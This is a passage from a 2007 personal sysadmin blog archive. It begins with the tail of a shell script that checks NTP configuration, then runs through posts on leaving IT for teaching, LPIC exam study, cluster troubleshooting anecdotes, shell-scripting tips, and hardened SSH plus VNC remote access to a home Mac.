				QUERY="$HOSTNAME"
				echo "Skipping IP address verification" >> $DEBUGFILE
			else
				QUERY="$HOSTNAME $IPADDRESS"	
				[[ $DEBUG -gt 0 ]] && echo "Checking both IP and name." >> $DEBUGFILE
			fi
		fi

		if [[ $DEBUG -gt 0 ]]
		then
			echo "IPADDRESS is $IPADDRESS" >> $DEBUGFILE
			echo "HOSTNAME is $HOSTNAME" >> $DEBUGFILE
			echo "" >> $DEBUGFILE
		fi

		for NAME in `echo $QUERY`
		do
		    [[ -z $(echo $NTPSERVERS | $GREP $NAME) ]] && let FAULT=$FAULT+1
		done

	done
    fi
}

### FINALLY, THE MAIN ROUTINE ###

SetupEnv

    if [[ $DEBUG -gt 0 ]]
    then
	echo "=== STARTING MAIN PHASE ===" >> $DEBUGFILE
	echo "" >> $DEBUGFILE
	echo "=== NTP CONFIG FILE ===" >> $DEBUGFILE
	cat $CFGFILE | grep -v ^"\#" >> $DEBUGFILE
	echo "" >> $DEBUGFILE
	echo "" >> $DEBUGFILE
    fi

ListInConf
ConfInList

# Nothing caused us to exit early, so we're okay.
if [[ $FAULT -gt 0 ]]
then
    echo "$STATE_NOK"
    exit $STATE_NOK
else
    echo "$STATE_OK"
    exit $STATE_OK
fi

kilala.nl tags: , , ,

View or add comments (curr. 0)

Tips and tools: Schoolhouse 2

2007-08-23 21:11:00

Studying is hectic business

As a student, especially as a freshman, things can become very chaotic. You will need to juggle your courses, your projects, your work and your social life. There's teachers and fellow students and there are all kinds of things you need to do.

In order to survive you'll need to keep a clear head and get your act together. Keeping track of all your work and having it all at your fingertips is crucial.

There are all kinds of tools and tricks that will help you get along. There's methodologies like PEP and GTD. And there's online tools like Gmail/Gcalender and MyQuire.

A lot of the modern operating systems also help you out by providing useful features. Mac OS X for example, features software like Spotlight, Time Machine, Address Book and iCal. I'm sure Windows comes with useful stuff too, but I'm just not familiar with that stuff ~_^

Getting organised: Schoolhouse 2

Recently I read an article on Life Hacker (a productivity blog) about Schoolhouse 2. The author lauded Schoolhouse as an innovative piece of software that has great potential.

SH lets you organize all your notes, files, project, tasks and assignments. The interface is quite similar to that of iTunes, so one should get quickly used to it. On the left hand side we can create folders and subfolders to symbolize years, terms and courses. (Smart) notebooks are the analogue of playlists, allowing you to sort assignments irrespective of their course.

Courses can be assigned a number of credits, so you'll know exactly what you're up against. Each course may also contain any number of notes, assignments, labs, midterms, exams, etc. All of these can be assigned grades, so you can track your progress throughout the term. In a nice twist of things, you can also assign each course teachers, project members, attachments and To Do lists.

The interface sports a number of useful buttons, like Ask teacher which automatically opens a new e-mail to your teach. The grade and calendar views are also pretty damn useful.

I've discovered a few downsides to Schoolhouse 2. For one the interface is still far from consistent and knows its instabilities. Also, all your notes and SH objects are stored in a proprietary database. The only exception being your attachments. As far as I know, the database doesn't hook into Spotlight, so you can't search SH from the operating system. Shame.

One of the most clamoured over features for SH is integration with iCal. Apparently the developer is looking into this, but he's only a student himself. Finding time to make a new version of Schoolhouse can be hard :)

Get Schoolhouse 2.

Also, please don't be stingy. Good software deserves a bit of a reward. If you find yourself using Schoolhouse for your daily work, please consider making a donation to Logan Collins. I'm sure he can use the dough for his software development.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Saving money as a college student

2007-08-22 11:57:00

Recently I discovered that the Netherlands' largest online bookstore Bol deals in secondhand books. Or more precisely: it works as an intermediary between seller and buyer. I guess you could compare it to the Amazon Marketplace.

Study books are notoriously expensive, often ranging between forty and a hundred euros a piece. Of course I wasn't looking forward to paying such a huge sum now that I'm starting college. Lo and behold! Bol's secondhand section listed six out of the eight books I need for the first semester. By buying these books I managed to save seventy euros, bringing the total down to a little over two hundred. Nice!

Another nice way of saving a few bucks is the fact that Hogeschool Utrecht allows spread payment of my fees. This year's college fee is about a thousand euros, give or take a few. Instead of paying this whole sum up front, I can now pay in six terms. Even better, these terms are spread all over the whole year. This means that we can easily save up a little money and still have ample breathing room.


kilala.nl tags: , ,

View or add comments (curr. 4)

It'll be a grand year!

2007-08-22 08:58:00

My roster for this school year

There you have it: my school roster for this year. It may be a bit hard to read the first time around, but let me break it down for you.

The table shows all courses for both the first and second years of my study (english math teacher). All course are given on Monday and the appropriate times are shown on the left. The four columns to the right indicate each semester: there's four in a year and most courses are only given once a year.

Due to my prior experience and BCS in electronics I get to skip on approximately 100 - 130 ECTS out of the 240 ECTS required for the whole study. ECTS are the pan-European equivalent of America's credits. Because of that I can manage to squeeze in some of my second year courses in the first year. W00t! /o/

SEMESTER 1:

* Statistiek 1. I'll need to study both the math and the didactics behind statistics and the calculation of changes.

* SLB. This roughly translates as Study career guidance. We'll discuss my progress, the school itself, the materials. It's a bit of a meta-course.

* Vakdidactiek 2. A second year project on didactics and the interaction with students. I'll need to find out whether I can take this in the first semester without any big problems.

SEMESTER 2:

* Analyse 1. I can skip the math behind analytical math (differentials, integrals, logarithms), but I'll need to study the didactics.

* SLB. The same as the first semester.

* WER. Preparing for my internships, later in the year.

* Kijk op leerlingen. A project on the psychology and behaviour of students.

One challenge that I'm going to have to tackle is this. In my first two years I'll have the course WER, which stands for Work, Experience, Reflection. The second-year WER requires me to teach ten consecutive classes, one a week. This would mean that I'd have to convince Snow to allow me to take ten three-day work weeks. Ouch. So far I don't know how or when all of this will take place, but I'd better prepare a good story for Snow :)


kilala.nl tags: , ,

View or add comments (curr. 0)

Contacting Thomas Sluyter

2007-08-19 19:35:00

Recently we've been getting a lot of spam in our e-mail boxes, thanks to various bots grabbing our mail addresses from our contact pages. That's why we decided to put all the info in a .JPG instead. Sorry for any inconvenience.

Of course I also have a LinkedIn profile.

If you would like to send me an encrypted email, or if you would like to verify a signed email I sent you: here is my public PGP key

Contact info for Thomas


kilala.nl tags: , ,

View or add comments (curr. 13)

College applications take time

2007-08-16 10:28:00

Damn. I should've seen this coming.

I just phoned the IBG to check up on my college application. The school coordinator'd told me that my application would come through in time, but I decided to check up on it anyway. Nope. No sign of any application or registration yet. Apparently they take three to four weeks to process. Ugh!

Now I'm going to have to make arrangements with school to either study there unregistered, or to do some other red-tape trickery. It'll work itself out, but it still feels a little stressful.


kilala.nl tags: , ,

View or add comments (curr. 2)

Math revision

2007-08-14 21:36:00

Seven math books.

Since school starts in about three weeks I thought it was about damn time to start getting prepared! It's one thing to make all arrangements with the school, taking care of paperwork and talking to people. But it's another thing entirely to actually be prepared for the course material!

I graduated from college a little over seven years ago. For about half of my college years I was very busy with maths, learning all kinds of new tricks. All the other time was spent programming, doing web design and learning about Unix. Since my career progressed with the latter half of what I just described, it's only natural for my maths to be a little rusty.

Well, rusty would be an understatement. Consider if you will one of the original, iron nails that Noah had used in his arc. Having been exposed to tremendous amounts of sea water and ages upon ages of time it's sure to be a bit rusty. Now, let's assume that ever since that flood the nail had been exposed to corrosives, acid rain and various other nasties. Not much would be left of it, right? A nasty, little chunk of iron would be all that's left.

Well, that's where my current grasp of maths is.

Thankfully I am confident that I can at least completely revive my high school math skills, considering this blog post. Back in 2005 I prepped Marlijne for an exam that consisted of all my HS maths in only a few hours.

Also thankfully, unlike what I wrote in that blog post, I did -not- throw away my math books! /o/

The picture above shows all of the books that I want to go through before school starts. The bottom row (plus the b/w book at the top left) are all high school books from my final two years. They cover everything from functions and equations, through trigonometry, to differentials and logarithms.

The top row is the stuff I went through in college. It's also the stuff that currently gives me a dread feeling in my stomach because it is way beyond me. They start out by repeating a little bit of HS stuff (differentials, functions), but then quickly move on to limits, logarithms, partial differentials, integrals, multiple variable equations and vectors. Zounds! I won't even mention the two other books that cover Laplace transforms and Fourier strains. Although I doubt whether I'll need to know any of that stuff.

Unfortunately I -have- thrown out all of my syllabi, meaning that I'm out of materials on chance calculation and on matrices. Luckily my friend The Saint is willing to lend me his copies. Apparently his storage space is larger than mine and he's hung onto most of the stuff from our college years ^_^

Well! Here I go! Study study study!


kilala.nl tags: , , ,

View or add comments (curr. 2)

Big career changes: submitting my enrollment

2007-08-07 07:55:00

An envelope lying on a table.

Well, now there's absolutely no way back: I've sent in my application form for the local college. Hopefully I'll receive more information in a few days time.

I have to say that I rather dislike the application process though. In the Netherlands, there's one big organisation that handles 99% of the college and uni applications: Informatie Beheer Groep. They also take care of all student loans and grants and the resulting debts. As they are a governmental organisation, they allow one to log in using one's national DigID. This DigID is tied to one's social security number and allows one to get a lot of stuff done through the web. Thus one will not have to fill out endless forms, or to wait for hours at city hall.

Theoretically speaking that is. Because for some reason the IB Groep doesn't allow you to any applications online. Oh sure, they've made a very nice web app that'll walk you through the process of filling out the form with all the requisite data. Sure! But once the whole process is done, you're still going to have to print the form, sign it and send it in. :(

I thought we were getting that DigID (which includes SMS verificatin) to sign crap like this?

Anywho: the application is on its way! /o/


kilala.nl tags: , ,

View or add comments (curr. 2)

Grappling with HP ServiceGuard

2007-08-01 15:26:00

Last night's planned change was supposed to last about two hours: get in, install some patches, switch some cluster resources around the nodes, install some more patches and get out. The fact that the installation involved a HP-UX system didn't get me down, even though we only work with Sun Solaris and Tru64. The fact that it involved a ServiceGuard cluster did make me a little apprehensive, but I felt confident that the procedures $CLIENT had supplied me would suffice.

Everything went great, until the 80% mark... Failing the applications back over to their original node failed for some reason and the cluster went into a wonky state. The cluster software told me everything was down, even though some of the software was obviously still running. The cluster wouldn't budge, not up, nor down. And that's when I found out that I rather dislike HP ServiceGuard, all because of one stupid flaw.

You see, all the other cluster software I know provides me with a proper listing of all the defined resources and their current state. Sun Cluster, Veritas Cluster Service and Tru Cluster? All of them are able to give me neat list of what's running where and why something went wrong. Well, not HP Damn ServiceGuard. Feh!

We ended up stopping the database manually and resetting all kinds of flags on the cluster software. Finally, after six hours (instead of the original two), I got off from work around 23:00. Yes... /me heartily dislikes HP ServiceGuard.


kilala.nl tags: , , , ,

View or add comments (curr. 1)

Happy sysadmin day!

2007-07-27 10:55:00

It's the last Friday of July and you know what that means. It's Sysadmin Day, an international holiday on which end-users thank their admins for all their hard work! Or it would be, if anyone actually cared... *sigh* All I ever wanted was an STFU mug.

To all the sysadmins who -do- get some appreciation from their customers today: good on you! Enjoy your brief period in the lime light! ^_^


kilala.nl tags: , , ,

View or add comments (curr. 2)

Mac OS X: locking your screen, without a screen saver password

2007-07-26 17:41:00

This afternoon my buddy Edmond came up to me with an interesting predicament. He runs Mac OS X on his Macbook and would like to:

A) have a password-less screen saver

B) have the ability to lock his screen with a password

Usually one simply uses screen saver passwords to achieve goal B, but Ed was adamant that he wanted A as well. Not something you often see, right? Initially I thought it wouldn't be possible, but then I had a flash of insight. It's possible! Here's how...

1. Open "System Preferences". Go into "Security".

2. Uncheck the box marked "Require password to wake...".

3. Open "Keychain Access". Open its preferences window.

4. Check the box marked "Show status in menu bar".

5. A padlock appears in your menu bar.

From now on you can lock your screen by clicking on the padlock and selecting "Lock screen". And you can still use your screen saver and go back into the OS without a password. The only downside to this is that one can also wake up your system from sleep without a password. Not something I'd like to have if my laptop was ever stolen.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Sun Fire V890: pretty, but with a nasty flaw

2007-07-17 10:12:00

The ports section of the V890.

Oy vey! One of the folks on the Sun Fire V890 must've been mesjoge! Why else would you decided to make such a weird design decision?!

What's up? I'll tell you what's up!

For some reason the design team decided to throw out the RJ45 console port that's been a Sun standard for nigh on ten years. And what did they replace it with? A DB25 port commonly seen in the Mesozoic Era! Good lord! This left me stranded without the proper cable for this morning's installation (thankfully I could borrow one). However, it also requires us to get completely new and different cables for our Cyclades console server!

Bad Sun! How could you make such a silly decision?!


kilala.nl tags: , , , ,

View or add comments (curr. 5)

Big career changes: talking to the college

2007-07-11 09:16:00

So far I've talked to the people in the field, the folks I should end up working with. Now, in order to get there I've started talking with the college I'm eyeing.

First off, here's the pages for the two courses that I need to decide between:

* Second degree teacher in English

* Second degree teacher in Math

I've talked to the secretariate of the english course. They told me I'd be able to enroll until the end of August, so that seems fine to me. They also suggested that I e-mail the course's coorinator to pose specific questions and to arrange for an intake meeting. At said meeting we'd discuss my curricilum and how it can be adjusted to fit my prior experience.

So. Off to send an e-mail I am!


kilala.nl tags: , ,

View or add comments (curr. 0)

Big career changes: talking to the experts

2007-07-10 23:47:00

I can heartily recommend anyone considering a career switch to go and have a chat with people who work in their aspired field.

I made a little visit to my old high school this morning, to talk to their HR guy. He gave me a lot of valuable tips and suggested that a part-time study would indeed be the best and safest option for me. He indicated that it would be nigh on impossible for me to get a zij-instroom position, due to my lack of experience.

He also suggested that I go have a talk with the CWI (Centrum voor Werk en Inkomen), the part of the dutch government charged with work and job security. He reckoned that I might strike a lucky deal with them, getting a subsidy for hours I didn't spend working for Snow. In order to make time for my education I'd need to cut back on my working hours (and thus my monthly wages) by about 40%. This grant might help cover for at least part of the money I'd miss out on.

Tomorrow I'll also make a phone call with the CO of another high school. His number was given to me by my father's girlfriend who happens to work with the fellow. I'm curious if he has some other useful tips for me :)


kilala.nl tags: , , , ,

View or add comments (curr. 1)

Big career changes: where do we go from here?

2007-07-10 23:34:00

Now that I'd decided to become a teacher, it left me with even more questions (duh). Which subject would I teach? At what kind of school? What kind of education do I need? Where do I study? How will this fit in with my job? Will I even be able to keep my job? OMG, will we be able to pay our mortgage and still have food on the table?! ONOZ!

Stuff like that.

Well... I quickly decided that I'd like to teach english or math at a high school level. I can wax lyrically about both subjects and both fields offer me with loads of new stuff to learn and explore.

So... How do you go from having a completely unrelated job, to being a teacher? Here's how... (mind you, all of this applies to the Netherlands).

You start out with two options:

1. You take up a part-time or full-time college education. (deeltijd or voltijd in dutch).

2. You take up a part-time teaching position and follow additional classes to become a real teacher.

This second option is called zij-instroom in dutch and really is only an option if your ambitions lie in teaching the same field you worked in. So for example, I could get a zij-instroom position teaching Comp Sci at high schools, whereas a biologist could start teaching Biology. Zij-instroom however requires you to have real and provable experience in said field, including the degrees that come with it. You will also need to take an entrance exam because they won't let just everybody start teaching. Should you be accepted for zij-instroom, then you'll get a two-year teaching permit, which is directly connected to a contract between you and the school in question.

Anywho... What with zij-instroom not being an option for my two chosen fields (I have neither a degree, nor work experience in english or math) I have to opt for the longer path. Getting into a full-time education (voltijd) really isn't an option for me anymore: I wouldn't have any income, I'd be bored stiff and I'd be in a class full of eighteen year olds. Which automatically guides me towards a part-time education.

Luckily every college in the Netherlands offers deeltijd educations for professionals looking for a career switch, or an upgrade to their knowledge. The Hogeschool Utrecht offers teachers educations that are actually reputable and it's close to my home as well! Now all that remains is to convince my employer to let me work either three or four days a week. *gulp*


kilala.nl tags: , , ,

View or add comments (curr. 2)

Big career changes: prelude

2007-07-10 22:25:00

This blog post was made invisible initially. It has now been made available to the Internet at large. Sorry for breaking continuity :D

Back in April, I felt like crap. Then, in June, it came back. Now, with the start of July I've made my decision:

I'm getting out of IT.

That day in June something snapped inside of me and I decided that I could no longer carry on working as a sysadmin. The work no longer motivates me, nor does it offer me some shine of glamour. I know that, while there are still endless, uncharted seas for me to discover, this field no longer holds a challenge for me. I know that whatever I'll need to learn, I'll be able to do so in a few days. Lather, rinse, repeat, until I grow old.

No thank you.

No longer will I be shifting bits and bytes around, being a faceless peon in a huge corporation. No longer will I be burning midnight oil at the altar of Unix.

Instead I will make difference in this world and I will be of use to the general public. I will try to educate this world's children, nudging them into directions they might otherwise ignore.

I have decided to go into education and become a high school teacher.


kilala.nl tags: , , ,

View or add comments (curr. 3)

Training to be a safety steward

2007-06-24 10:24:00

A safety steward's jacket

Yesterday was a very well spent day! I may have been way too busy and I may have gotten way too little sleep, but it was damn well worth it. For yesterday was the first of two whole-day training sessions to become a BHV worker.

In dutch, BHV is an abbreviation for Bedrijfs HulpVerlener, which can be roughly translated as Company Safety Steward. In short, these are the people who are there to limit the scope of a disaster on the workfloor, while waiting for the professionals to arrive. They apply first aid, the guide an evacuation and they fight a starting fire. All in all a very important job!

Over here, in the Netherlands, every company is required by law to have BHVs on hand. Originally the law required a minimum of one BHV per fifty people, but these days it just calls for an appropriate amount. This means that it could be anything between 1:10 (retirement homes, hospitals) to 1:50 (office buildings). BHVs should be sufficiently trained a know how to prevent panic and/or casualties.

Yesterday's session focussed on an intro to BHV, communcations during an incident an on fighting fires. This also included fighting gas and petrol fires using CO2 and foam extinguishers. This was a truly awesome day!

Our training was delivered by the good fellows of TBT fire and medical. If you're looking for a good BHV training, give these guys a ring.


kilala.nl tags: , ,

View or add comments (curr. 4)

Open Solaris, like Linux but with bureaucrats

2007-06-15 18:23:00

Two things before I start this rant:

1. I'm not overly familiar with the OGB and the Open Solaris project's modus operandi. I'm going to bone up on those subjects tonight.

2. It seems that the dutch branch of the OS project doesn't even notice much of the OGB's dealings. When I asked one of "our" leading guys about some recent dealings he hadn't actually even heard of them yet.

Now... On with the show.

When it comes to the Open Solaris project I'm having mixed feelings. On the one hand Solaris and it's step-sister Open Solaris are my favourite "true" UNIX and I really want to see the OS to be a successful one. I feel at home in the OS, I admire the great improvements Sun and the community make to the OS and Solaris has almost never let me down (maybe one or two occasions).

But then there's discussions such as these: a few members of the Open Solaris community propose to build an official binary distribution (dubbed Project Indiana) and they have executive backing from Sun. The first reply is a rather constructive one: it tells what's wrong with the proposal and why it won't be accepted (in it's current form) by the OGB. But then the whole discussion derails with post upon post of bureaucracy, going back and forth about which rules should be applied to whom and what in which situations and at what times... Etc, etc...

While I'm all in favor of having strict project management and of handling your business in a organised and procedural manner, one can go too far. Linux has always felt a little bit too organic to me, although they do seem to get the job done in a rather good way. But the way the Open Solaris group works seems just way too convoluted to me. I hope that it's just a matter of streamlining things over the coming months/years and that things will loosen up a little by then.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Fedora Core 6 image for Parallels Desktop

2007-06-11 16:47:00

Now that I've gotten my mits on an Intel Macbook I've also started dabbling with Parallels Desktop, a piece of software that'll let you run a whole bunch of virtual machines inside Mac OS X. For my work it's rather handy to have a spare Solaris system lying around, so I went with the Solaris Express image that I mentioned a few weeks ago. And now that it's about time for me to get started on my LPIC-2 exam it's also handy to have at least one Linux at hand.

Enter a pre-installed and configured Fedora Core 6 image for Parallels. At only ~730MB in size that really isn't that bad. Saves me a lot of trouble as well.

Just be sure to set your RAM at 512 MB. Any higher is supposed to crash FC, according to this OS X hint.

EDIT:

Tried it with my last day of the Parallels demo. It works like a charm :)


kilala.nl tags: , , ,

View or add comments (curr. 6)

The passing of an era: Nagios

2007-05-20 19:05:00

Well, I have finally unsubscribed myself from the Nagios mailing lists. It was great being a member of those lists while I was working with the software on a daily basis, but these days I've put Nagios behind me. I haven't written one line of Nagios monitoring code for months now.

I'm sure I'll also be skipping this year's Nagios Konferenz unless a job involving monitoring comes up again.

Thanks Ethan, for making such great software freely available! All the best to you and maybe we'll meet again o/


kilala.nl tags: , , , ,

View or add comments (curr. 0)

TruCluster: an interesting performance problem

2007-05-11 11:24:00

The past two weeks we've been having a rather mysterious problem with one of our TruClusters.

During hardware maintenance of the B-node we moved all cluster resources to the A-node to remain up and running. Afterwards we let TruCluster balance all the resources so performance would benefit again. Sounds good so far and everything kept on working like it should.

However, during some nights the A-node would slow to a crawl, not responding to any commands and inputs. We were stumped, because we simply couldn't find the cause of the problem. The system wasn't overloaded, with a low load average. The CPU load was a bit remarkable, with 10% user, 50% system and the rest in idle. The network wasn't overloaded and there was no traffic corruption. None of the disks were overloaded, with just two disks seeing moderate to heavy use. It was a mystery and we asked HP to help us out.

After some analysis they found the cause of the problem :) Part of one of the applications that was failed over to the A-node were two file systems. After the balancing of resources these file systems stuck with the A-node, while the application moved back to the B-node. So now the A-node was serving I/O to the B-node through its cluster interconnect! This also explains the high System Land CPU load, since that was the kernel serving the I/O. :D

We'll be moving the file systems back to the B-node as well and we'll see whether that solves the issues. It probably will :)


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Sun's Solaris Express image for Parallels Desktop

2007-04-27 14:32:00

Ever since Apple switched to Intel processors in their systems and Parallels came out with their Parallels Desktop software it's been possible to run Windows, Linux and other Unices inside virtual machines on your Mac. That's totally great, since it allows you to run various test systems without needing additional hardware!

A lot of people also got Solaris 10 to run in PD, although some ran into a little bit of trouble. Well, not anymore! Sun has created a pre-installed Solaris Express image for use with Parallels Desktop. This allows you to immediately get up and running with Solaris, without even having to go through any of the normal installation hoops.

I know what I'll be doing when I get my Macbook in ;)

Thanks to Ben Rockwood for pointing out this little gem.


kilala.nl tags: , , ,

View or add comments (curr. 0)

Cutting down on the use of pipes

2007-04-18 14:38:00

One of the obvious down sides to using a scripting language like ksh as opposed to a "real" programming language like Perl or PHP (or C for that matter) is that, for each command that you string together, you're forking off a new process.

This isn't much of a problem when your script isn't too convoluted or when your dataset isn't too large. However, when you start processing 40-50MB log files with multiple FOR loops containing a few IF statements for each line, then you start running into performance issues.

And as I'm running into just that I'm trying to find ways to cut down on the forking, which means getting rid of as many IFs and pipes as possible. Here's a few examples of what has worked for me so far...

Instead of running:

[ expr1 ] && command1

[ expr2 ] && command1

Run:

[ (expr1) && (expr2) ] && command1

Why? Because if test works the way I expect it to, it'll die if the first expression is untrue, meaning that it won't even try the second expression. If you have multiple commands that complement eachother then you ought to be able to fit them into a set of parentheses after test cutting down on more forks.

Instead of running:

if [ `echo $STRING | grep $QUERY | wc -l` -gt 0 ]; then

Run:

if [ ! -z `echo $STRING | grep $QUERY` ]; then

More ideas to follow soon. Maybe I ought to start learning a "real" programming language? :D

EDIT:

OMG! I can't believe that I've just learnt this now, after eight years in the field! When using the Korn shell use [[ expr ]] for your tests as opposed to [ expr ].

Why? Because the [ expr ] is a throw-back to Bourne shell compatibility that makes use of the external test binary, as opposed to the built-in test function. This should speed up things considerably!


kilala.nl tags: , , , ,

View or add comments (curr. 0)

On commenting and debugging your code

2007-04-16 16:38:00

When writing shell scripts for my customers I always try to be as clear as possible, allowing them to modify my code even long after I'm gone. In order to achieve this I usually provide a rather lengthy piece of opening comments, with comments add throughout the script for each subroutine and for every switch or command that may be unclear to the untrained eye.

In general I've found that it's best to have at least the following information in your opening blurb:

* Who made the program? When was it finalised? Who requested the script to be made? Where can the author be reached for questions?

* A "usage" line that shows the reader how to call the program and which parameters are at his disposal.

* A description of what the program actually does.

* Descriptions for each of the parameters and options that can be passed to the script.

* The limitations imposed upon the script. Which specific software is needed? What other requisites are there? What are the nasty little things that may pop up unexpectedly?

* What are the current bugs and faults? The so-called FIXMEs.

* A description of the input that the program takes.

* A description of the output that the program generates.

Equally important is the inclusion of debugging capabilities. Of course you can start adding "echo" lines at various, strategic points in the script when you run into problems, but it's oh-so-much nicer if they're already in there! Adding those new lines is usually a messy affair that can make your problems even worse :( I usually prepend the debugging commands with "[ $DEBUG -eq 1 ] &&", which allows me to turn the debugging on or off at the top of the script using one variable.

And finally, for the more involved scripts, it's a great idea to write a small test suite. Build a script that actually takes the real script through its loops by automatically generating input and by introducing errors.

Two examples of script where I did all of this are check_suncluster and check_log3 with the new TEC-analysis.sh on its way in a few days.

So far, TEC-analysis.sh checks in at:

* 497 lines in total.

* 306 lines of actual code.

* 136 lines of comments.

* 55 lines of debugging code.

Approximately 39% of this script exists solely for the benefit of the reader and user.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

w00t! Passed my LPIC-102!

2007-04-06 10:57:00

Yay! There wasn't much reason for my doubting :) I passed with a 690 score (on a 200-930 scale), which boils down to 87% of 73 questions answered correctly. Not bad... Not bad at all...

Next up: ITIL Foundations!


kilala.nl tags: , , , ,

View or add comments (curr. 7)

LPIC-102 summary

2007-04-03 23:41:00

The LPIC-102 summary is done. You can find it over here, or in the menu on the left. Enjoy!


kilala.nl tags: , , , , , ,

View or add comments (curr. 0)

Finally! I'm done!

2007-04-03 23:37:00

Calvin hard at work

Ruddy heck, what a day! All in all it took me around thirteen hours, but I've finally finished my LPIC-102 summary. 41 pages of Linuxy goodness, bound to drag me through the second part of my LPIC-1 exams.

Argh, now I'm off to bed. =_= *cough* Let's hope I don't get called for any stand-by work.


kilala.nl tags: , , , ,

View or add comments (curr. 2)

Preparing for LPIC-102

2007-03-20 21:01:00

Cailin working hard

One of the rules my employer Snow imposes on its employees is a rather strict certification track. Technically speaking each employee progresses through five C-levels, starting at 0 and ending up at 4. As you reach new levels of certification you will also reap benefits of your hard work.

Let's take the track that applies to me as an example:

C0 = no certification

C1 = LPIC1 (101 and 102) and ITIL Fundamentals

C2 = LPIC2 (201 and 202)

C3 = SCSA1 and SCSA2

C4 = SCNA and others

The irony of the matter is that I've already achieved both SCSA exams and the SCNA exam a long time ago, but that I'm still stuck at C0 because I haven't done my LPICs. So to work myself up the ladder I'm slogging my way through the requisite LPIC stuff, even though I'm not that fond of Linux.

The challenge here lies in the fact that haven't used Linux in a professional environment that much, so I'm at a disadvantage when compared to the rest of my colleagues. I'm really glad I've always been a rather good student, so cramming with a few books should get me through. I managed to score a 660 (87%) at my LPIC-101, so that brings some hope :)

And now I'm cramming for the 102 exam! Since I was postponing it way too long, I reckoned I'd better get my act together! This week I took two days off to dedicate myself completely to studying. I managed to work through six of the nine objectives in these two days, resulting in a thirty-one page summary so far. In two weeks time I'll take another two days and then I'll be ready!

Like last time I'll post my summary over here, to help out all those other souls trundling through their LPICs.


kilala.nl tags: , , ,

View or add comments (curr. 3)

Fighting the Linksys WPC54g

2007-03-13 20:25:00

I'm well fed up with the whole PCMCIA switcheroo that I had gotten into to run my stand-by duties. I finally went out to Media Markt to get myself a Wifi card of my own. Who cares if the laptop belongs to $CLIENT? I want to work dammit! X[

I bought the Linksys WPC54g which is the first card that I'd borrowed from a colleague. Back then the card worked a treat and I had no problems whatsoever. But this time around, nothing but trouble! ;_; I think the crucial difference lies in the fact that the card I bought is v3, as opposed to either v2 or v4 (which was what I'd borrowed earlier). Incidentally, I'm running Windows 2000 on this Thinkpad.

Installing the card seemed to work alright: the driver installed perfectly, the card was recognized and the configuration utility installed as well. But for some reason the config util would keep on reporting the card as "WPC54g is inactive", suggesting a driver problem.

Well... A little digging around led me to this thread at the Linksys fora. It seems that the configuration tool (aka "Network monitor") is actually a piece of shit software, that doesn't work properly with the WPC54gv3 *grr*. As was suggested in the thread I installed McAfee Wireless Security, which is an alternative and free configuration tool for Wifi cards.

And lo and behold! It recognized the card and found my Wifi network. Got me connected without a problem. Thank God for McAfee! (Never thought I'd say that!)

Needless to say that my trust in Linksys has gone down a bit. All in all this took me a good two hours, which has well soured my mood :/


kilala.nl tags: , , , ,

View or add comments (curr. 3)

Parallellization in shell scripts

2007-03-13 15:05:00

Today I was working on a shell script that's supposed to process multiple text files in the exact same manner. Usually you can get through this by running a FOR-loop where the code inside the loop is repeated for each file in a sequential manner.

Since this would take a lot of time (going over 1e6 lines of text in multiple passes) I wondered whether it wouldn't be possible to run the contents of the FOR-loop in parallel. I rehashed my script into the following form:

subroutine()

{

contents of old FOR-loop, using $FILE

}

for file in "list of files"

do

FILE="$file"

subroutine &

done

This will result in a new instance of your script for each file in the list. Got seven files to process? You'll end up with seven additional processes that are vying for the CPUs attention.

On average I've found that the performance of my shell script was improved by a factor of 2.5, going from ~40 lines per three seconds to ~100 lines. I was processing seven files in this case.

The only downside to this is that you're going to have to build in some additional code that prevents your shell script from running ahead, while the subroutines are running in the background. What this code needs to be fully depends on the stuff you're doing in the subroutine.


kilala.nl tags: , , , ,

View or add comments (curr. 2)

Accessing your Mac at home, from work - reprise

2007-03-13 08:11:00

Well, It works, I can use my iBook at home from my desktop PC at work. I'd tested the whole setup at home, using both my Powermac and the Thinkpad $CLIENT gave me and VNC worked properly and rather smooth.

Unfortunately the Internet connection at $CLIENT isn't too great, so the VNC connection is a bit sluggish. Changing desktops (I run Desktop Manager to sort my apps across four desktops) takes a second or three and building a completely new screen takes about two. So it's not great, but it's doable at least.

I'll try this out for a few days, see how it pans out. If I don't get stuck in any way I'll leave my iBook at home from now on.


kilala.nl tags: , ,

View or add comments (curr. 0)

Accessing your Mac at home, from work

2007-03-12 22:08:00

A screenshot of VNC in action.

For weeks on end I've been dragging my iBook along to the office at $CLIENT, even though I'm not allowed to connect it to their network. My iBook is indispensable to me, because it contains all of my archives and past projects, all my e-mail and my address book and calendar. I even use my iBook to keep track of my working hours (thank you TimeLog 3!).

Unfortunately, dragging my laptop around can get tiresome, especially if I ride my bike to work. Which is why I'm very grateful to one of my colleagues for suggesting the use of VNC or another remote desktop solution. Seriously, the suggestion was so obvious that I'm really ashamed that I didn't think of it. I guess I was just clinging -too- much to my dear, sweet iBook.

Anywho... What I'm about to describe is only one of many ways to implement a remote desktop solution for your Mac. A few other options exist, but this is the one I'm using. What we're going to be building is the following:

* I'm at my desk at work, using one of the PCs over there.

* My iBook, running Mac OS 10.4 is at home, connected to my wifi network.

* I will be using my iBook, from my desk at work :)

What you'll need:

* A VNC server. I chose to use Vine Server, which came recommended.

* A VNC client. For Windows and Linux I chose to use Tight VNC and for OS X I use Chicken of the VNC.

* An SSH server. This comes built in, as part of Mac OS X.

* An SSH client. For Windows I use PuTTY, while Linux and OS X come built in with a client.

* Your home IP address. You can find this by browsing to What is my IP address? at home.

Setting up SSH at home

You can use the basic SSH configuration that comes with OS X, but it's not rock solid. If you'd like to be extra secure, please make the following changes. This will disable remote root access and will force each user to make use of SSH keys. If you didn't, you could log in using your normal password which opens you up to brute force password attacks.

* Open Terminal.app and enter the following commands.

cd /private/etc

sudo vi sshd_config

* Change the following lines, so they read as follows. The last two lines a

PermitRootLogin no

PasswordAuthentication no

UsePAM no

* (Re)start SSH

Open System Preferences.

Go to "Sharing".

(Re)start the "Remote access" server.

Setting up the VNC server at home

Vine Server comes in a .DMG and you can simply copy the binary to its desired location. By starting the application you're presented with the applications configuration options, which has buttons at the bottom to stop and start the VNC server.

* You can leave most settings at their default values, but it's extra safe to change the following:

Connection -> set a password

Sharing -> only allow local connections

This secures your VNC server with a password and prevents people on your local network from connecting to your desktop. You'll only be able to login to VNC after logging in to your system through SSH.

* Press the "Start server" button.

